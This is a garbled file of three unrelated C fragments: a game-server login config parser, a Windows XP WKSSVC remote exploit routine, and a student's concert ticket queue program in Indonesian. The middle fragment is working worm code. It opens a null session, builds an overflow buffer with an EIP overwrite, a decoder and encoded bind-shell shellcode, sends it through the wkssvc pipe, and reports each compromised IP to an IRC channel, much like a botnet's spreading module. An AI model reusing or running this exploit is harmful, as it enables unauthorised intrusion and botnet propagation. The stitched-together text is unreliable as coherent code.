/** * Reading main configuration file. * @param cfgName: Name of the configuration (could be fullpath) * @param normal: Config read normally when server started * @return True:success, Fals:failure (file not found|readable) */ bool login_config_read(const char* cfgName, bool normal) { char line[1024], w1[32], w2[1024]; FILE* fp = fopen(cfgName, "r"); if (fp == NULL) { ShowError("Configuration file (%s) not found.\n", cfgName); return false; } while(fgets(line, sizeof(line), fp)) { if (line[0] == '/' && line[1] == '/') continue; if (sscanf(line, "%31[^:]: %1023[^\r\n]", w1, w2) < 2) continue; // Config that loaded only when server started, not by reloading config file if (normal) { if( !strcmpi(w1, "bind_ip") ) { login_config.login_ip = host2ip(w2); if( login_config.login_ip ) { char ip_str[16]; ShowStatus("Login server binding IP address : %s -> %s\n", w2, ip2str(login_config.login_ip, ip_str)); } } else if( !strcmpi(w1, "login_port") ) login_config.login_port = (uint16)atoi(w2); else if(!strcmpi(w1, "console")) login_config.console = (bool)config_switch(w2); } if(!strcmpi(w1,"timestamp_format")) safestrncpy(timestamp_format, w2, 20); else if(strcmpi(w1,"db_path")==0) safestrncpy(db_path, w2, ARRAYLENGTH(db_path)); else if(!strcmpi(w1,"stdout_with_ansisequence")) stdout_with_ansisequence = config_switch(w2); else if(!strcmpi(w1,"console_silent")) { msg_silent = atoi(w2); if( msg_silent ) /* only bother if we actually have this enabled */ ShowInfo("Console Silent Setting: %d\n", atoi(w2)); } else if (strcmpi(w1, "console_msg_log") == 0) console_msg_log = atoi(w2); else if (strcmpi(w1, "console_log_filepath") == 0) safestrncpy(console_log_filepath, w2, sizeof(console_log_filepath)); else if(!strcmpi(w1, "log_login")) login_config.log_login = (bool)config_switch(w2); else if(!strcmpi(w1, "new_account")) login_config.new_account_flag = (bool)config_switch(w2); else if(!strcmpi(w1, "new_acc_length_limit")) login_config.new_acc_length_limit = (bool)config_switch(w2); else if(!strcmpi(w1, "start_limited_time")) login_config.start_limited_time = atoi(w2); else if(!strcmpi(w1, "use_MD5_passwords")) login_config.use_md5_passwds = (bool)config_switch(w2); else if(!strcmpi(w1, "group_id_to_connect")) login_config.group_id_to_connect = atoi(w2); else if(!strcmpi(w1, "min_group_id_to_connect")) login_config.min_group_id_to_connect = atoi(w2); else if(!strcmpi(w1, "date_format")) safestrncpy(login_config.date_format, w2, sizeof(login_config.date_format)); else if(!strcmpi(w1, "allowed_regs")) //account flood protection system login_config.allowed_regs = atoi(w2); else if(!strcmpi(w1, "time_allowed")) login_config.time_allowed = atoi(w2); else if(!strcmpi(w1, "use_dnsbl")) login_config.use_dnsbl = (bool)config_switch(w2); else if(!strcmpi(w1, "dnsbl_servers")) safestrncpy(login_config.dnsbl_servs, w2, sizeof(login_config.dnsbl_servs)); else if(!strcmpi(w1, "ipban_cleanup_interval")) login_config.ipban_cleanup_interval = (unsigned int)atoi(w2); else if(!strcmpi(w1, "ip_sync_interval")) login_config.ip_sync_interval = (unsigned int)1000*60*atoi(w2); //w2 comes in minutes. else if(!strcmpi(w1, "client_hash_check")) login_config.client_hash_check = config_switch(w2); else if(!strcmpi(w1, "client_hash")) { int group = 0; char md5[33]; if (sscanf(w2, "%3d, %32s", &group, md5) == 2) { struct client_hash_node *nnode; CREATE(nnode, struct client_hash_node, 1); if (strcmpi(md5, "disabled") == 0) { nnode->hash[0] = '\0'; } else { int i; for (i = 0; i < 32; i += 2) { char buf[3]; unsigned int byte; memcpy(buf, &md5[i], 2); buf[2] = 0; sscanf(buf, "%2x", &byte); nnode->hash[i / 2] = (uint8)(byte & 0xFF); } } nnode->group_id = group; nnode->next = login_config.client_hash_nodes; login_config.client_hash_nodes = nnode; } } else if(strcmpi(w1, "chars_per_account") == 0) { //maxchars per account [Sirius]
BOOL ScriptGod_WKSSVC( unsigned long nTargetID, EXINFO exinfo ) { int TargetOS; char szShellBuf[ 512 ]; int iShellSize; // ============================= char* pszTarget; // --- char szNetbiosTarget[ 8192 ]; wchar_t wszNetbiosTarget[ 8192 ]; unsigned char szShellcodeEncoded[ ( sizeof( szShellBuf ) * 2 ) + 1 ]; unsigned char szExploitsData[ 3500 ]; unsigned long nExploitsDataPos; wchar_t wszExploitsData[ sizeof( szExploitsData ) ]; // --- char szIPC[ 8192 ]; NETRESOURCE NetSource; // --- char szPipe[ 8192 ]; HANDLE hPipe; // --- RPC_ReqBind BindPacket; unsigned long nBytesWritten; RPC_ReqNorm ReqNormalHeader; unsigned long nPacketSize; unsigned char* pPacket; unsigned long nPacketPos; // ============================ // check if xp TargetOS = FpHost( exinfo.ip, FP_RPC ); if( TargetOS != OS_WINXP ) return FALSE; // parameters pszTarget = exinfo.ip; // get shellcode iShellSize = GetRNS0TerminatedShellcode( szShellBuf, sizeof( szShellBuf ), GetIP( exinfo.sock ), filename ); if( !iShellSize ) return FALSE; // generate exploits buffer // ======================== memset( szShellcodeEncoded, 0, sizeof( szShellcodeEncoded ) ); memset( szExploitsData, 0, sizeof( szExploitsData ) ); memset( wszExploitsData, 0, sizeof( wszExploitsData ) ); // fill with NOPs (using inc ecx instead of NOP, 0-terminated-string) memset( szExploitsData, 'A', sizeof( szExploitsData ) - 1 ); // new EIP *(unsigned long*)( &szExploitsData[ Targets[ nTargetID ].nNewEIP_BufferOffset ] ) = Targets[ nTargetID ].nNewEIP; // some NOPs nExploitsDataPos = 2300; // add stack memcpy( &szExploitsData[ nExploitsDataPos ], szStack, sizeof( szStack ) - 1 ); nExploitsDataPos += sizeof( szStack ) - 1; // add decoder memcpy( &szExploitsData[ nExploitsDataPos ], szDecoder, sizeof( szDecoder ) - 1 ); nExploitsDataPos += sizeof( szDecoder ) - 1; // add shellcode // - bind port // - encode Encode( (unsigned char*)szShellBuf, iShellSize, szShellcodeEncoded ); // - add memcpy( &szExploitsData[ nExploitsDataPos ], szShellcodeEncoded, strlen( (char*)szShellcodeEncoded ) ); nExploitsDataPos += strlen( (char*)szShellcodeEncoded ); // - 0 terminaten for decoder szExploitsData[ nExploitsDataPos ] = 0; nExploitsDataPos += 1; // convert to UNICODE // ================== for( int n = 0; n < sizeof( szExploitsData ); n++ ) wszExploitsData[ n ] = szExploitsData[ n ]; //MultiByteToWideChar( CP_ACP, 0, (char*)szExploitsData, -1, wszExploitsData, sizeof( wszExploitsData ) / sizeof( wchar_t ) ); snprintf( szNetbiosTarget, sizeof( szNetbiosTarget ), "\\\\%s", pszTarget ); mbstowcs( wszNetbiosTarget, szNetbiosTarget, sizeof( wszNetbiosTarget ) / sizeof( wchar_t ) ); // create NULL session // =================== if( strcmpi( pszTarget, "." ) ) { snprintf( szIPC, sizeof( szIPC ), "\\\\%s\\ipc$", pszTarget ); memset( &NetSource, 0 ,sizeof( NetSource ) ); NetSource.lpRemoteName = szIPC; fWNetAddConnection2( &NetSource, "", "", 0 ); } // =================== // connect to pipe // =============== snprintf( szPipe, sizeof( szPipe ), "\\\\%s\\pipe\\wkssvc", pszTarget ); hPipe = CreateFile( szPipe, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL ); if( hPipe == INVALID_HANDLE_VALUE ) { fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE ); return FALSE; } // =============== // bind packet // =========== memset( &BindPacket, 0, sizeof( BindPacket ) ); BindPacket.NormalHeader.versionmaj = 5; BindPacket.NormalHeader.versionmin = 0; BindPacket.NormalHeader.type = 11; // bind BindPacket.NormalHeader.flags = 3; // first + last fragment BindPacket.NormalHeader.representation = 0x00000010; // little endian BindPacket.NormalHeader.fraglength = sizeof( BindPacket ); BindPacket.NormalHeader.authlength = 0; BindPacket.NormalHeader.callid = 1; BindPacket.maxtsize = 4280; BindPacket.maxrsize = 4280; BindPacket.assocgid = 0; BindPacket.numelements = 1; BindPacket.contextid = 0; BindPacket.numsyntaxes = 1; BindPacket.Interface1.version = 1; memcpy( BindPacket.Interface1.byte, "\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3\xf8\x7e\x34\x5a", 16 ); BindPacket.Interface2.version = 2; memcpy( BindPacket.Interface2.byte, "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60", 16 ); // send if( !WriteFile( hPipe, &BindPacket, sizeof( RPC_ReqBind ), &nBytesWritten, NULL ) ) { CloseHandle( hPipe ); fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE ); return FALSE; } // =========== // request // ======= // generate packet // --------------- // calc packet size nPacketSize = 0; nPacketSize += sizeof( szWKSSVCUnknown1 ) - 1; nPacketSize += sizeof( UNISTR2 ); nPacketSize += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t ); while( nPacketSize % 4 ) nPacketSize++; if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName ) nPacketSize += sizeof( szWKSSVCUnknown2 ) - 1; nPacketSize += sizeof( UNISTR2 ); nPacketSize += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t ); while( nPacketSize % 4 ) nPacketSize++; nPacketSize += 8; // szWSSKVCUnknown3 if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName ) nPacketSize += 4; // NetAddAlternateComputerName = reserved else nPacketSize += 2; // NetValidateName = NameType // alloc packet pPacket = (unsigned char*)malloc( nPacketSize ); if( !pPacket ) { CloseHandle( hPipe ); fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE ); return FALSE; } memset( pPacket, 0, nPacketSize ); // build packet nPacketPos = 0; // - szWKSSVCUnknown1 memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown1, sizeof( szWKSSVCUnknown1 ) - 1 ); nPacketPos += sizeof( szWKSSVCUnknown1 ) - 1; // - wszNetbiosTarget ( (UNISTR2*)&pPacket[ nPacketPos ] )->length = wcslen( wszNetbiosTarget ) + 1; ( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown = 0; ( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength = ( (UNISTR2*)&pPacket[ nPacketPos ] )->length; nPacketPos += sizeof( UNISTR2 ); wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszNetbiosTarget ); nPacketPos += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t ); // - align while( nPacketPos % 4 ) nPacketPos++; // - szWKSSVCUnknown2 if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName ) { memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown2, sizeof( szWKSSVCUnknown2 ) - 1 ); nPacketPos += sizeof( szWKSSVCUnknown2 ) - 1; } // - wszExploitsData ( (UNISTR2*)&pPacket[ nPacketPos ] )->length = wcslen( wszExploitsData ) + 1; ( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown = 0; ( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength = ( (UNISTR2*)&pPacket[ nPacketPos ] )->length; nPacketPos += sizeof( UNISTR2 ); wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszExploitsData ); nPacketPos += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t ); // - align while( nPacketPos % 4 ) nPacketPos++; // - szWSSKVCUnknown3 (only eigth 0x00s) memset( &pPacket[ nPacketPos ], 0, 8 ); nPacketPos += 8; if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName ) { // NetAddAlternateComputerName = 0 *(DWORD*)&pPacket[ nPacketPos ] = 0; nPacketPos += sizeof( DWORD ); } else { // NetValidateName = NetSetupMachine *(unsigned short*)&pPacket[ nPacketPos ] = 1; nPacketPos += 2; } // header memset( &ReqNormalHeader, 0, sizeof( ReqNormalHeader ) ); ReqNormalHeader.NormalHeader.versionmaj = 5; ReqNormalHeader.NormalHeader.versionmin = 0; ReqNormalHeader.NormalHeader.type = 0; // request ReqNormalHeader.NormalHeader.flags = 3; // first + last fragment ReqNormalHeader.NormalHeader.representation = 0x00000010; // little endian ReqNormalHeader.NormalHeader.authlength = 0; ReqNormalHeader.NormalHeader.callid = 1; ReqNormalHeader.prescontext = 0; if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName ) ReqNormalHeader.opnum = 27; // NetrAddAlternateComputerName else ReqNormalHeader.opnum = 25; // NetrValidateName2 // send if( !SendReqPacket_Part( hPipe, ReqNormalHeader, pPacket, nPacketSize, 4280, true ) ) { CloseHandle( hPipe ); free( pPacket ); fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE ); return FALSE; } // ======= // clean up // =================; CloseHandle( hPipe ); free( pPacket ); fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE ); char buffer[ IRCLINE ]; _snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip); irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); addlog(buffer); exploit[exinfo.exploit].stats++; return TRUE; }
void main() { //Deklarasi Antrian dan data penampung. Queue QFest,QTribun; Data NewVal; double TotalJumlah=0,TotalT=0,TotalF=0; int menu; //Inisialisasi Antrian CreateEmpty(&QFest); CreateEmpty(&QTribun); //showMenu do { system("CLS"); printf("===== KONSER TONG TONG BAND =====\n"); printf("1. Masukan Antrian \n"); printf("2. Tampil Antrian Tribun \n"); printf("3. Tampil Antrian Festival \n"); printf("4. Transaksi Antrian Tribun \n"); printf("5. Transaksi Antrian Festival \n"); printf("6. Jumlah Pendapatan \n"); printf("7. TUGAS - Jumlah Pendapatan \n"); printf("================================= \n"); printf(" >> Masukan Menu : "); scanf("%d",&menu); switch(menu) { case 1 ://Input Antrian printf(" Nama : "); fflush(stdin); gets(NewVal.nama); printf(" No Hp : "); fflush(stdin); gets(NewVal.no_hp); //Pemilihan Jenis Tiket while(strcmpi(NewVal.jenis_tiket,"festival")!=0 && strcmpi(NewVal.jenis_tiket,"tribun")!=0) { printf(" Jenis Tiket(festival/tribun) : "); fflush(stdin); gets(NewVal.jenis_tiket); } if(strcmpi(NewVal.jenis_tiket,"festival")==0) { //Cek AntrianFestival if (isFull(QFest)) { printf("\n antrian penuh . . ."); strcpy(NewVal.jenis_tiket,"-"); break; } //Auto Tiket NewVal.no_antrian=AutoID(&QFest); printf(" Nomor Tiket : %d \n",NewVal.no_antrian); //Prosesur Add Add(&QFest,NewVal); } if(strcmpi(NewVal.jenis_tiket,"tribun")==0) { //Cek AntrianTribun if (isFull(QTribun)) { printf("\n antrian penuh . . ."); strcpy(NewVal.jenis_tiket,"-"); break; } //Auto Tiket NewVal.no_antrian=AutoID(&QTribun); printf(" Nomor Tiket : %d \n",NewVal.no_antrian); //Prosesur Add Add(&QTribun,NewVal); } //Reset Jenis Tiket strcpy(NewVal.jenis_tiket,"-"); break; case 2 : //Cek Antrian Kosong if (isEmpty(&QTribun)) { printf("\n antrian kosong . . ."); break; } //Prosedur Show ShowQueue(QTribun); break; case 3 : //Cek Antrian Kosong if (isEmpty(&QFest)) { printf("\n antrian kosong . . ."); break; } //Prosedur Show ShowQueue(QFest); break; case 4 : if (isEmpty(&QTribun)) { printf("\n antrian kosong . . ."); break; } //Print Transaksi printf("\n ====== Transaksi Tribun====== \n"); JumlahPendapatan(QTribun,&TotalJumlah,&TotalT,&TotalF); Delete(&QTribun); break; case 5 : if (isEmpty(&QFest)) { printf("\n antrian kosong . . ."); break; } //Print Transaksi printf("\n ====== Transaksi Festival====== \n"); JumlahPendapatan(QFest,&TotalJumlah,&TotalT,&TotalF); Delete(&QFest); break; case 6 : printf("\n Total Pendapatan = %lf",TotalJumlah); break; case 7 : printf("\n Total Pendapatan Tribun = %lf",TotalT); printf("\n Total Pendapatan Festival = %lf",TotalF); printf("\n---------------------------------------- ++"); printf("\n Total Pendapatan = %lf",TotalT+TotalF); break; case 8 : printf(" Head %d \n",QTribun.head); printf(" Tail %d \n",QTribun.tail); } getch(); } while(menu!=0); }